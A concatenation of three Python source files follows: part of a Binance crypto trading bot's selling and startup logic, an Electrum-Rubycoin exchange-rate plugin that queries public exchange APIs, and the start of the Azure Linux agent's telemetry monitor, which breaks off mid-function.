SL = float(coins_bought[coin]['bought_at']) + (float(coins_bought[coin]['bought_at']) * coins_bought[coin]['stop_loss']) / 100
LastPrice = float(last_price[coin]['price'])
BuyPrice = float(coins_bought[coin]['bought_at'])
PriceChange = float((LastPrice - BuyPrice) / BuyPrice * 100)
# check that the price is above the take profit and readjust SL and TP accordingly if trialing stop loss used
if LastPrice > TP and USE_TRAILING_STOP_LOSS:
# increasing TP by TRAILING_TAKE_PROFIT (essentially next time to readjust SL)
coins_bought[coin]['take_profit'] = PriceChange + TRAILING_TAKE_PROFIT
coins_bought[coin]['stop_loss'] = coins_bought[coin]['take_profit'] - TRAILING_STOP_LOSS
if DEBUG: print(f"{coin} TP reached, adjusting TP {coins_bought[coin]['take_profit']:.2f} and SL {coins_bought[coin]['stop_loss']:.2f} accordingly to lock-in profit")
continue
# check that the price is below the stop loss or above take profit (if trailing stop loss not used) and sell if this is the case
if coin in externals or LastPrice < SL or LastPrice > TP and not USE_TRAILING_STOP_LOSS:
print(f"{txcolors.SELL_PROFIT if PriceChange >= 0. else txcolors.SELL_LOSS}TP or SL reached, selling {coins_bought[coin]['volume']} {coin} - {BuyPrice} - {LastPrice} : {PriceChange-(TRADING_FEE*2):.2f}% Est:${(QUANTITY*(PriceChange-(TRADING_FEE*2)))/100:.2f}{txcolors.DEFAULT}")
if PriceChange >= 0:
trades_won += 1
if USE_BINANCE_LIMIT_SELL:
LastPrice = TP
else:
trades_lost += 1
if USE_BINANCE_LIMIT_SELL:
LastPrice = SL
if USE_BINANCE_LIMIT_SELL:
PriceChange = float((LastPrice - BuyPrice) / BuyPrice * 100)
# try to create a real order
try:
if not TEST_MODE:
sell_coins_limit = client.create_order(
symbol = coin,
side = 'SELL',
type = 'MARKET',
quantity = coins_bought[coin]['volume']
)
# error handling here in case position cannot be placed
except Exception as e:
print(e)
# run the else block if coin has been sold and create a dict for each coin sold
else:
coins_sold[coin] = coins_bought[coin]
# prevent system from buying this coin for the next TIME_DIFFERENCE minutes
volatility_cooloff[coin] = datetime.now()
# Log trade
if LOG_TRADES:
profit = ((LastPrice - BuyPrice) * coins_sold[coin]['volume'])* (1-(TRADING_FEE*2)) # adjust for trading fee here
write_log(f"Sell: {coins_sold[coin]['volume']} {coin} - {BuyPrice} - {LastPrice} Profit: {profit:.2f} {PriceChange-(TRADING_FEE*2):.2f}%")
write_log(f"trades won: {trades_won}, trades lost: {trades_lost}")
session_profit=session_profit + (PriceChange-(TRADING_FEE*2))/MAX_COINS
continue
# no action; print once every TIME_DIFFERENCE
if hsp_head == 1:
if len(coins_bought) > 0:
print(f'TP or SL not yet reached, not selling {coin} for now {BuyPrice} - {LastPrice} : {txcolors.SELL_PROFIT if PriceChange >= 0. else txcolors.SELL_LOSS}{PriceChange-(TRADING_FEE*2):.2f}% Est:${(QUANTITY*(PriceChange-(TRADING_FEE*2)))/100:.2f}{txcolors.DEFAULT}')
# check if session target has been met
if hsp_head == 1 and len(coins_bought) == 0: print(f'Not holding any coins')
return coins_sold
def check_total_session_profit(coins_bought, last_price):
BUDGET = MAX_COINS * QUANTITY
global session_profit, is_bot_running
TotalSessionChange = session_profit
for coin in list(coins_bought):
LastPrice = float(last_price[coin]['price'])
BuyPrice = float(coins_bought[coin]['bought_at'])
PriceChange = float((LastPrice - BuyPrice) / BuyPrice * 100)
TotalSessionChange = float(TotalSessionChange + (PriceChange - (TRADING_FEE*2))/MAX_COINS)
print(f'ACTUAL session profit: {TotalSessionChange:.2f}% Est:${TotalSessionChange/100 * BUDGET:.2f}')
if (TotalSessionChange >= SESSION_TAKE_PROFIT or TotalSessionChange <= -SESSION_STOP_LOSS):
print(f'Session target %{TotalSessionChange:.2f} met or exceeded targets. Sell all coins now!')
is_bot_running = False
#TODO: call sell-remaining-coins
def update_portfolio(orders, last_price, volume):
'''add every coin bought to our portfolio for tracking/selling later'''
if DEBUG: print(orders)
for coin in orders:
coins_bought[coin] = {
'symbol': orders[coin][0]['symbol'],
'orderid': orders[coin][0]['orderId'],
'timestamp': orders[coin][0]['time'],
'bought_at': last_price[coin]['price'],
'volume': volume[coin],
'stop_loss': -STOP_LOSS,
'take_profit': TAKE_PROFIT,
}
# save the coins in a json file in the same directory
with open(coins_bought_file_path, 'w') as file:
json.dump(coins_bought, file, indent=4)
print(f'Order with id {orders[coin][0]["orderId"]} placed and saved to file')
def remove_from_portfolio(coins_sold):
'''Remove coins sold due to SL or TP from portfolio'''
for coin in coins_sold:
coins_bought.pop(coin)
with open(coins_bought_file_path, 'w') as file:
json.dump(coins_bought, file, indent=4)
def write_log(logline):
timestamp = datetime.now().strftime("%d/%m %H:%M:%S")
with open(LOG_FILE,'a+') as f:
f.write(timestamp + ' ' + logline + '\n')
if __name__ == '__main__':
# Load arguments then parse settings
args = parse_args()
mymodule = {}
# set to false at Start
global bot_paused
bot_paused = False
DEFAULT_CONFIG_FILE = 'config.yml'
DEFAULT_CREDS_FILE = 'creds.yml'
config_file = args.config if args.config else DEFAULT_CONFIG_FILE
creds_file = args.creds if args.creds else DEFAULT_CREDS_FILE
parsed_config = load_config(config_file)
parsed_creds = load_config(creds_file)
# Default no debugging
DEBUG = False
# Load system vars
TEST_MODE = parsed_config['script_options']['TEST_MODE']
LOG_TRADES = parsed_config['script_options'].get('LOG_TRADES')
LOG_FILE = parsed_config['script_options'].get('LOG_FILE')
DEBUG_SETTING = parsed_config['script_options'].get('DEBUG')
AMERICAN_USER = parsed_config['script_options'].get('AMERICAN_USER')
# Load trading vars
PAIR_WITH = parsed_config['trading_options']['PAIR_WITH']
QUANTITY = parsed_config['trading_options']['QUANTITY']
MAX_COINS = parsed_config['trading_options']['MAX_COINS']
FIATS = parsed_config['trading_options']['FIATS']
TIME_DIFFERENCE = parsed_config['trading_options']['TIME_DIFFERENCE']
RECHECK_INTERVAL = parsed_config['trading_options']['RECHECK_INTERVAL']
CHANGE_IN_PRICE = parsed_config['trading_options']['CHANGE_IN_PRICE']
STOP_LOSS = parsed_config['trading_options']['STOP_LOSS']
TAKE_PROFIT = parsed_config['trading_options']['TAKE_PROFIT']
CUSTOM_LIST = parsed_config['trading_options']['CUSTOM_LIST']
TICKERS_LIST = parsed_config['trading_options']['TICKERS_LIST']
USE_TRAILING_STOP_LOSS = parsed_config['trading_options']['USE_TRAILING_STOP_LOSS']
TRAILING_STOP_LOSS = parsed_config['trading_options']['TRAILING_STOP_LOSS']
TRAILING_TAKE_PROFIT = parsed_config['trading_options']['TRAILING_TAKE_PROFIT']
TRADING_FEE = parsed_config['trading_options']['TRADING_FEE']
SIGNALLING_MODULES = parsed_config['trading_options']['SIGNALLING_MODULES']
USE_SESSION_THRESHOLD = parsed_config['trading_options']['USE_SESSION_THRESHOLD']
SESSION_TAKE_PROFIT = parsed_config['trading_options']['SESSION_TAKE_PROFIT']
SESSION_STOP_LOSS = parsed_config['trading_options']['SESSION_STOP_LOSS']
USE_BINANCE_LIMIT_SELL = parsed_config['trading_options']['USE_BINANCE_LIMIT_SELL']
if DEBUG_SETTING or args.debug:
DEBUG = True
# Load creds for correct environment
access_key, secret_key = load_correct_creds(parsed_creds)
if DEBUG:
print(f'loaded config below\n{json.dumps(parsed_config, indent=4)}')
print(f'Your credentials have been loaded from {creds_file}')
# Authenticate with the client, Ensure API key is good before continuing
if AMERICAN_USER:
client = Client(access_key, secret_key, tld='us')
else:
client = Client(access_key, secret_key)
# If the users has a bad / incorrect API key.
# this will stop the script from starting, and display a helpful error.
api_ready, msg = test_api_key(client, BinanceAPIException)
if api_ready is not True:
exit(f'{txcolors.SELL_LOSS}{msg}{txcolors.DEFAULT}')
# Use CUSTOM_LIST symbols if CUSTOM_LIST is set to True
if CUSTOM_LIST: tickers=[line.strip() for line in open(TICKERS_LIST)]
# try to load all the coins bought by the bot if the file exists and is not empty
coins_bought = {}
# path to the saved coins_bought file
coins_bought_file_path = 'coins_bought.json'
# rolling window of prices; cyclical queue
historical_prices = [None] * (TIME_DIFFERENCE * RECHECK_INTERVAL)
hsp_head = -1
# prevent including a coin in volatile_coins if it has already appeared there less than TIME_DIFFERENCE minutes ago
volatility_cooloff = {}
# use separate files for testing and live trading
if TEST_MODE:
coins_bought_file_path = 'test_' + coins_bought_file_path
# if saved coins_bought json file exists and it's not empty then load it
if os.path.isfile(coins_bought_file_path) and os.stat(coins_bought_file_path).st_size!= 0:
with open(coins_bought_file_path) as file:
coins_bought = json.load(file)
print('Press Ctrl-Q to stop the script')
if not TEST_MODE:
if not args.notimeout: # if notimeout skip this (fast for dev tests)
print('WARNING: You are using the Mainnet and live funds. Waiting 30 seconds as a security measure')
time.sleep(30)
signals = glob.glob("signals/*.exs")
for filename in signals:
for line in open(filename):
try:
os.remove(filename)
except:
if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file {filename}{txcolors.DEFAULT}')
if os.path.isfile("signals/paused.exc"):
try:
os.remove("signals/paused.exc")
except:
if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file {filename}{txcolors.DEFAULT}')
# load signalling modules
try:
if len(SIGNALLING_MODULES) > 0:
for module in SIGNALLING_MODULES:
print(f'Starting {module}')
mymodule[module] = importlib.import_module(module)
t = threading.Thread(target=mymodule[module].do_work, args=())
t.daemon = True
t.start()
time.sleep(2)
else:
print(f'No modules to load {SIGNALLING_MODULES}')
except Exception as e:
print(e)
# seed initial prices
get_price()
while is_bot_running:
orders, last_price, volume = buy()
update_portfolio(orders, last_price, volume)
coins_sold = sell_coins()
remove_from_portfolio(coins_sold)
|
exchange_rate.py | from datetime import datetime
import inspect
import requests
import sys
from threading import Thread
import time
import traceback
import csv
from decimal import Decimal
from electrum_rubycoin.rubycoin import COIN
from electrum_rubycoin.plugins import BasePlugin, hook
from electrum_rubycoin.i18n import _
from electrum_rubycoin.util import PrintError, ThreadJob
from electrum_rubycoin.util import format_satoshis
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0}
class ExchangeBase(PrintError):
def __init__(self, on_quotes, on_history):
self.history = {}
self.quotes = {}
self.on_quotes = on_quotes
self.on_history = on_history
def protocol(self):
return "https"
def get_json(self, site, get_string):
url = "".join([self.protocol(), '://', site, get_string])
response = requests.request('GET', url,
headers={'User-Agent' : 'Electrum'})
return response.json()
def get_csv(self, site, get_string):
url = "".join([self.protocol(), '://', site, get_string])
response = requests.request('GET', url,
headers={'User-Agent' : 'Electrum'})
reader = csv.DictReader(response.content.split('\n'))
return list(reader)
def name(self):
return self.__class__.__name__
def update_safe(self, ccy):
try:
self.print_error("getting fx quotes for", ccy)
self.quotes = self.get_rates(ccy)
self.print_error("received fx quotes")
except BaseException as e:
self.print_error("failed fx quotes:", e)
self.on_quotes()
def update(self, ccy):
t = Thread(target=self.update_safe, args=(ccy,))
t.setDaemon(True)
t.start()
def get_historical_rates_safe(self, ccy):
try:
self.print_error("requesting fx history for", ccy)
self.history[ccy] = self.historical_rates(ccy)
self.print_error("received fx history for", ccy)
self.on_history()
except BaseException as e:
self.print_error("failed fx history:", e)
def get_historical_rates(self, ccy):
result = self.history.get(ccy)
if not result and ccy in self.history_ccys():
t = Thread(target=self.get_historical_rates_safe, args=(ccy,))
t.setDaemon(True)
t.start()
return result
def history_ccys(self):
return []
def historical_rate(self, ccy, d_t):
return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'))
class Bit2C(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitcoinaverage.com', '/ticker/global/all')
return dict([(r, Decimal(json[r]['last']))
for r in json if r != 'timestamp'])
def history_ccys(self):
return ['AUD', 'BRL', 'CAD', 'CHF', 'CNY', 'EUR', 'GBP', 'IDR', 'ILS',
'MXN', 'NOK', 'NZD', 'PLN', 'RON', 'RUB', 'SEK', 'SGD', 'USD',
'ZAR']
def historical_rates(self, ccy):
history = self.get_csv('api.bitcoinaverage.com',
"/history/%s/per_day_all_time_history.csv" % ccy)
return dict([(h['DateTime'][:10], h['Average'])
for h in history])
class BitcoinVenezuela(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitcoinvenezuela.com', '/')
rates = [(r, json['RBY'][r]) for r in json['RBY']
if json['RBY'][r] is not None] # Giving NULL sometimes
return dict(rates)
def protocol(self):
return "http"
def history_ccys(self):
return ['ARS', 'EUR', 'USD', 'VEF']
def historical_rates(self, ccy):
json = self.get_json('api.bitcoinvenezuela.com',
'/historical/index.php?coin=RBY')
return json[ccy +'_RBY']
class Bitfinex(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitfinex.com', '/v1/pubticker/stratusd')
return {'USD': Decimal(json['last_price'])}
class BTCChina(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('data.btcchina.com', '/data/ticker?market=stratcny')
return {'CNY': Decimal(json['ticker']['last'])}
class BTCe(ExchangeBase):
def get_rates(self, ccy):
ccys = ['EUR', 'RUR', 'USD']
ccy_str = '-'.join(['strat_%s' % c.lower() for c in ccys])
json = self.get_json('btc-e.com', '/api/3/ticker/%s' % ccy_str)
result = dict.fromkeys(ccys)
for ccy in ccys:
result[ccy] = Decimal(json['strat_%s' % ccy.lower()]['last'])
return result
class CaVirtEx(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.cavirtex.com', '/api2/ticker.json?currencypair=RBYCAD')
return {'CAD': Decimal(json['ticker']['RBYCAD']['last'])}
class CoinSpot(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.coinspot.com.au', '/pubapi/latest')
return {'AUD': Decimal(json['prices']['strat']['last'])}
class GoCoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('x.g0cn.com', '/prices')
strat_prices = json['prices']['RBY']
return dict([(r, Decimal(strat_prices[r])) for r in strat_prices])
class HitBTC(ExchangeBase):
def get_rates(self, ccy):
ccys = ['EUR', 'USD']
json = self.get_json('api.hitbtc.com', '/api/1/public/RBY%s/ticker' % ccy)
result = dict.fromkeys(ccys)
if ccy in ccys:
result[ccy] = Decimal(json['last'])
return result
class Kraken(ExchangeBase):
def get_rates(self, ccy):
dicts = self.get_json('api.kraken.com', '/0/public/AssetPairs')
pairs = [k for k in dicts['result'] if k.startswith('XRBYZ')]
json = self.get_json('api.kraken.com',
'/0/public/Ticker?pair=%s' % ','.join(pairs))
ccys = [p[5:] for p in pairs]
result = dict.fromkeys(ccys)
result[ccy] = Decimal(json['result']['XRBYZ'+ccy]['c'][0])
return result
def history_ccys(self):
return ['EUR', 'USD']
def historical_rates(self, ccy):
query = '/0/public/OHLC?pair=RBY%s&interval=1440' % ccy
json = self.get_json('api.kraken.com', query)
history = json['result']['XRBYZ'+ccy]
return dict([(time.strftime('%Y-%m-%d', time.localtime(t[0])), t[4])
for t in history])
class OKCoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.okcoin.cn', '/api/ticker.do?symbol=strat_cny')
return {'CNY': Decimal(json['ticker']['last'])}
class MercadoBitcoin(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('mercadobitcoin.net',
"/api/ticker/ticker_rubycoin")
return {'BRL': Decimal(json['ticker']['last'])}
def history_ccys(self):
return ['BRL']
class Bitcointoyou(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('bitcointoyou.com',
"/API/ticker_rubycoin.aspx")
return {'BRL': Decimal(json['ticker']['last'])}
def history_ccys(self):
return ['BRL']
def dictinvert(d):
inv = {}
for k, vlist in d.iteritems():
for v in vlist:
keys = inv.setdefault(v, [])
keys.append(k)
return inv
def get_exchanges():
is_exchange = lambda obj: (inspect.isclass(obj)
and issubclass(obj, ExchangeBase)
and obj != ExchangeBase)
return dict(inspect.getmembers(sys.modules[__name__], is_exchange))
def get_exchanges_by_ccy():
"return only the exchanges that have history rates (which is hardcoded)"
d = {}
exchanges = get_exchanges()
for name, klass in exchanges.items():
exchange = klass(None, None)
d[name] = exchange.history_ccys()
return dictinvert(d)
class FxThread(ThreadJob):
def __init__(self, config, network):
self.config = config
self.network = network
self.ccy = self.get_currency()
self.history_used_spot = False
self.ccy_combo = None
self.hist_checkbox = None
self.exchanges = get_exchanges()
self.exchanges_by_ccy = get_exchanges_by_ccy()
self.set_exchange(self.config_exchange())
def get_exchanges_by_ccy(self, ccy, h):
return self.exchanges_by_ccy.get(ccy, [])
def ccy_amount_str(self, amount, commas):
prec = CCY_PRECISIONS.get(self.ccy, 2)
fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec))
return fmt_str.format(round(amount, prec))
def run(self):
# This runs from the plugins thread which catches exceptions
if self.is_enabled():
if self.timeout ==0 and self.show_history():
self.exchange.get_historical_rates(self.ccy)
if self.timeout <= time.time():
self.timeout = time.time() + 150
self.exchange.update(self.ccy)
def is_enabled(self):
return bool(self.config.get('use_exchange_rate'))
def set_enabled(self, b):
return self.config.set_key('use_exchange_rate', bool(b))
def get_history_config(self):
return bool(self.config.get('history_rates'))
def set_history_config(self, b):
self.config.set_key('history_rates', bool(b))
def get_currency(self):
'''Use when dynamic fetching is needed'''
return self.config.get("currency", "EUR")
def config_exchange(self):
return self.config.get('use_exchange', 'BTCe')
def show_history(self):
return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys()
def set_currency(self, ccy):
self.ccy = ccy
self.config.set_key('currency', ccy, True)
self.timeout = 0 # Because self.ccy changes
self.on_quotes()
def set_exchange(self, name):
class_ = self.exchanges.get(name) or self.exchanges.values()[0]
name = class_.__name__
self.print_error("using exchange", name)
if self.config_exchange() != name:
self.config.set_key('use_exchange', name, True)
self.exchange = class_(self.on_quotes, self.on_history)
# A new exchange means new fx quotes, initially empty. Force
# a quote refresh
self.timeout = 0
def on_quotes(self):
self.network.trigger_callback('on_quotes')
def on_history(self):
self.network.trigger_callback('on_history')
def exchange_rate(self):
'''Returns None, or the exchange rate as a Decimal'''
rate = self.exchange.quotes.get(self.ccy)
if rate:
return Decimal(rate)
def format_amount_and_units(self, btc_balance):
rate = self.exchange_rate()
return '' if rate is None else "%s %s" % (self.value_str(btc_balance, rate), self.ccy)
def get_fiat_status_text(self, btc_balance):
rate = self.exchange_rate()
return _(" (No FX rate available)") if rate is None else " 1 BTC~%s %s" % (self.value_str(COIN, rate), self.ccy)
def value_str(self, satoshis, rate):
if satoshis is None: # Can happen with incomplete history
return _("Unknown")
if rate:
value = Decimal(satoshis) / COIN * Decimal(rate)
return "%s" % (self.ccy_amount_str(value, True))
return _("No data")
def history_rate(self, d_t):
rate = self.exchange.historical_rate(self.ccy, d_t)
# Frequently there is no rate for today, until tomorrow :)
# Use spot quotes in that case
if rate is None and (datetime.today().date() - d_t.date()).days <= 2:
rate = self.exchange.quotes.get(self.ccy)
self.history_used_spot = True
return rate
def historical_value_str(self, satoshis, d_t):
rate = self.history_rate(d_t)
return self.value_str(satoshis, rate)
|
monitor.py | # Copyright 2018 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import datetime
import json
import os
import platform
import time
import threading
import traceback
import uuid
import azurelinuxagent.common.conf as conf
import azurelinuxagent.common.logger as logger
from azurelinuxagent.common.errorstate import ErrorState
from azurelinuxagent.common.cgroups import CGroups, CGroupsTelemetry
from azurelinuxagent.common.event import add_event, report_metric, WALAEventOperation
from azurelinuxagent.common.exception import EventError, ProtocolError, OSUtilError, HttpError
from azurelinuxagent.common.future import ustr
from azurelinuxagent.common.osutil import get_osutil
from azurelinuxagent.common.protocol import get_protocol_util
from azurelinuxagent.common.protocol.healthservice import HealthService
from azurelinuxagent.common.protocol.imds import get_imds_client
from azurelinuxagent.common.protocol.restapi import TelemetryEventParam, \
TelemetryEventList, \
TelemetryEvent, \
set_properties
import azurelinuxagent.common.utils.networkutil as networkutil
from azurelinuxagent.common.utils.restutil import IOErrorCounter
from azurelinuxagent.common.utils.textutil import parse_doc, findall, find, getattrib, hash_strings
from azurelinuxagent.common.version import DISTRO_NAME, DISTRO_VERSION, \
DISTRO_CODE_NAME, AGENT_LONG_VERSION, \
AGENT_NAME, CURRENT_AGENT, CURRENT_VERSION
def parse_event(data_str):
try:
return parse_json_event(data_str)
except ValueError:
return parse_xml_event(data_str)
def parse_xml_param(param_node):
name = getattrib(param_node, "Name")
value_str = getattrib(param_node, "Value")
attr_type = getattrib(param_node, "T")
value = value_str
if attr_type == 'mt:uint64':
value = int(value_str)
elif attr_type == 'mt:bool':
value = bool(value_str)
elif attr_type == 'mt:float64':
value = float(value_str)
return TelemetryEventParam(name, value)
def parse_xml_event(data_str):
try:
xml_doc = parse_doc(data_str)
event_id = getattrib(find(xml_doc, "Event"), 'id')
provider_id = getattrib(find(xml_doc, "Provider"), 'id')
event = TelemetryEvent(event_id, provider_id)
param_nodes = findall(xml_doc, 'Param')
for param_node in param_nodes:
event.parameters.append(parse_xml_param(param_node))
return event
except Exception as e:
raise ValueError(ustr(e))
def parse_json_event(data_str):
data = json.loads(data_str)
event = TelemetryEvent()
set_properties("TelemetryEvent", event, data)
return event
def get_monitor_handler():
return MonitorHandler()
class MonitorHandler(object):
EVENT_COLLECTION_PERIOD = datetime.timedelta(minutes=1)
TELEMETRY_HEARTBEAT_PERIOD = datetime.timedelta(minutes=30)
CGROUP_TELEMETRY_PERIOD = datetime.timedelta(minutes=5)
# host plugin
HOST_PLUGIN_HEARTBEAT_PERIOD = datetime.timedelta(minutes=1)
HOST_PLUGIN_HEALTH_PERIOD = datetime.timedelta(minutes=5)
# imds
IMDS_HEARTBEAT_PERIOD = datetime.timedelta(minutes=1)
IMDS_HEALTH_PERIOD = datetime.timedelta(minutes=3)
def __init__(self):
self.osutil = get_osutil()
self.protocol_util = get_protocol_util()
self.imds_client = get_imds_client()
self.event_thread = None
self.last_event_collection = None
self.last_telemetry_heartbeat = None
self.last_cgroup_telemetry = None
self.last_host_plugin_heartbeat = None
self.last_imds_heartbeat = None
self.protocol = None
self.health_service = None
self.last_route_table_hash = b''
self.last_nic_state = {}
self.counter = 0
self.sysinfo = []
self.should_run = True
self.heartbeat_id = str(uuid.uuid4()).upper()
self.host_plugin_errorstate = ErrorState(min_timedelta=MonitorHandler.HOST_PLUGIN_HEALTH_PERIOD)
self.imds_errorstate = ErrorState(min_timedelta=MonitorHandler.IMDS_HEALTH_PERIOD)
def run(self):
self.init_protocols()
self.init_sysinfo()
self.init_cgroups()
self.start()
def stop(self):
self.should_run = False
if self.is_alive():
self.event_thread.join()
def init_protocols(self):
self.protocol = self.protocol_util.get_protocol()
self.health_service = HealthService(self.protocol.endpoint)
def is_alive(self):
return self.event_thread is not None and self.event_thread.is_alive()
def start(self):
self.event_thread = threading.Thread(target=self.daemon)
self.event_thread.setDaemon(True)
self.event_thread.start()
def init_sysinfo(self):
osversion = "{0}:{1}-{2}-{3}:{4}".format(platform.system(),
DISTRO_NAME,
DISTRO_VERSION,
DISTRO_CODE_NAME,
platform.release())
self.sysinfo.append(TelemetryEventParam("OSVersion", osversion))
self.sysinfo.append(
TelemetryEventParam("GAVersion", CURRENT_AGENT))
try:
ram = self.osutil.get_total_mem()
processors = self.osutil.get_processor_cores()
self.sysinfo.append(TelemetryEventParam("RAM", ram))
self.sysinfo.append(TelemetryEventParam("Processors", processors))
except OSUtilError as e:
logger.warn("Failed to get system info: {0}", e)
try:
vminfo = self.protocol.get_vminfo()
self.sysinfo.append(TelemetryEventParam("VMName",
vminfo.vmName))
self.sysinfo.append(TelemetryEventParam("TenantName",
vminfo.tenantName))
self.sysinfo.append(TelemetryEventParam("RoleName",
vminfo.roleName))
self.sysinfo.append(TelemetryEventParam("RoleInstanceName",
vminfo.roleInstanceName))
self.sysinfo.append(TelemetryEventParam("ContainerId",
vminfo.containerId))
except ProtocolError as e:
logger.warn("Failed to get system info: {0}", e)
try:
vminfo = self.imds_client.get_compute()
self.sysinfo.append(TelemetryEventParam('Location',
vminfo.location))
self.sysinfo.append(TelemetryEventParam('SubscriptionId',
vminfo.subscriptionId))
self.sysinfo.append(TelemetryEventParam('ResourceGroupName',
vminfo.resourceGroupName))
self.sysinfo.append(TelemetryEventParam('VMId',
vminfo.vmId))
self.sysinfo.append(TelemetryEventParam('ImageOrigin',
vminfo.image_origin))
except (HttpError, ValueError) as e:
logger.warn("failed to get IMDS info: {0}", e)
def collect_event(self, evt_file_name):
try:
logger.verbose("Found event file: {0}", evt_file_name)
with open(evt_file_name, "rb") as evt_file:
# if fail to open or delete the file, throw exception
data_str = evt_file.read().decode("utf-8", 'ignore')
logger.verbose("Processed event file: {0}", evt_file_name)
os.remove(evt_file_name)
return data_str
except IOError as e:
msg = "Failed to process {0}, {1}".format(evt_file_name, e)
raise EventError(msg)
def collect_and_send_events(self):
if self.last_event_collection is None:
self.last_event_collection = datetime.datetime.utcnow() - MonitorHandler.EVENT_COLLECTION_PERIOD
if datetime.datetime.utcnow() >= (self.last_event_collection + MonitorHandler.EVENT_COLLECTION_PERIOD):
try:
event_list = TelemetryEventList()
event_dir = os.path.join(conf.get_lib_dir(), "events")
event_files = os.listdir(event_dir)
for event_file in event_files:
if not event_file.endswith(".tld"):
continue
event_file_path = os.path.join(event_dir, event_file)
try:
data_str = self.collect_event(event_file_path)
except EventError as e:
logger.error("{0}", e)
continue
try:
event = parse_event(data_str)
self.add_sysinfo(event)
event_list.events.append(event)
except (ValueError, ProtocolError) as e:
logger.warn("Failed to decode event file: {0}", e)
continue
if len(event_list.events) == 0:
return
try:
self.protocol.report_event(event_list)
except ProtocolError as e:
logger.error("{0}", e)
except Exception as e:
logger.warn("Failed to send events: {0}", e)
self.last_event_collection = datetime.datetime.utcnow()
def daemon(self):
min_delta = min(MonitorHandler.TELEMETRY_HEARTBEAT_PERIOD,
MonitorHandler.CGROUP_TELEMETRY_PERIOD,
MonitorHandler.EVENT_COLLECTION_PERIOD,
MonitorHandler.HOST_PLUGIN_HEARTBEAT_PERIOD,
MonitorHandler.IMDS_HEARTBEAT_PERIOD).seconds
while self.should_run:
self.send_telemetry_heartbeat()
self.send_cgroup_telemetry()
self.collect_and_send_events()
self.send_host_plugin_heartbeat()
self.send_imds_heartbeat()
self.log_altered_network_configuration()
time.sleep(min_delta)
def add_sysinfo(self, event):
sysinfo_names = [v.name for v in self.sysinfo]
for param in event.parameters:
if param.name in sysinfo_names:
logger.verbose("Remove existing event parameter: [{0}:{1}]",
param.name,
param.value)
event.parameters.remove(param)
event.parameters.extend(self.sysinfo)
def send_imds_heartbeat(self):
"""
Send a health signal every IMDS_HEARTBEAT_PERIOD. The signal is 'Healthy' when we have
successfully called and validated a response in the last IMDS_HEALTH_PERIOD.
"""
if self.last_imds_heartbeat is None:
self.last_imds_heartbeat = datetime.datetime.utcnow() - MonitorHandler.IMDS_HEARTBEAT_PERIOD
if datetime.datetime.utcnow() >= (self.last_imds_heartbeat + MonitorHandler.IMDS_HEARTBEAT_PERIOD):
try:
is_currently_healthy, response = self.imds_client.validate()
if is_currently_healthy:
self.imds_errorstate.reset()
else:
self.imds_errorstate.incr()
is_healthy = self.imds_errorstate.is_triggered() is False
logger.verbose("IMDS health: {0} [{1}]", is_healthy, response)
self.health_service.report_imds_status(is_healthy, response)
except Exception as e:
msg = "Exception sending imds heartbeat: {0}".format(ustr(e))
add_event(
name=AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.ImdsHeartbeat,
is_success=False,
message=msg,
log_event=False)
self.last_imds_heartbeat = datetime.datetime.utcnow()
def send_host_plugin_heartbeat(self):
"""
Send a health signal every HOST_PLUGIN_HEARTBEAT_PERIOD. The signal is 'Healthy' when we have been able to
communicate with HostGAPlugin at least once in the last HOST_PLUGIN_HEALTH_PERIOD.
"""
if self.last_host_plugin_heartbeat is None:
self.last_host_plugin_heartbeat = datetime.datetime.utcnow() - MonitorHandler.HOST_PLUGIN_HEARTBEAT_PERIOD
if datetime.datetime.utcnow() >= (
self.last_host_plugin_heartbeat + MonitorHandler.HOST_PLUGIN_HEARTBEAT_PERIOD):
try:
host_plugin = self.protocol.client.get_host_plugin()
host_plugin.ensure_initialized()
is_currently_healthy = host_plugin.get_health()
if is_currently_healthy:
self.host_plugin_errorstate.reset()
else:
self.host_plugin_errorstate.incr()
is_healthy = self.host_plugin_errorstate.is_triggered() is False
logger.verbose("HostGAPlugin health: {0}", is_healthy)
self.health_service.report_host_plugin_heartbeat(is_healthy)
if not is_healthy:
add_event(
name=AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.HostPluginHeartbeatExtended,
is_success=False,
message='{0} since successful heartbeat'.format(self.host_plugin_errorstate.fail_time),
log_event=False)
except Exception as e:
msg = "Exception sending host plugin heartbeat: {0}".format(ustr(e))
add_event(
name=AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.HostPluginHeartbeat,
is_success=False,
message=msg,
log_event=False)
self.last_host_plugin_heartbeat = datetime.datetime.utcnow()
def send_telemetry_heartbeat(self):
if self.last_telemetry_heartbeat is None:
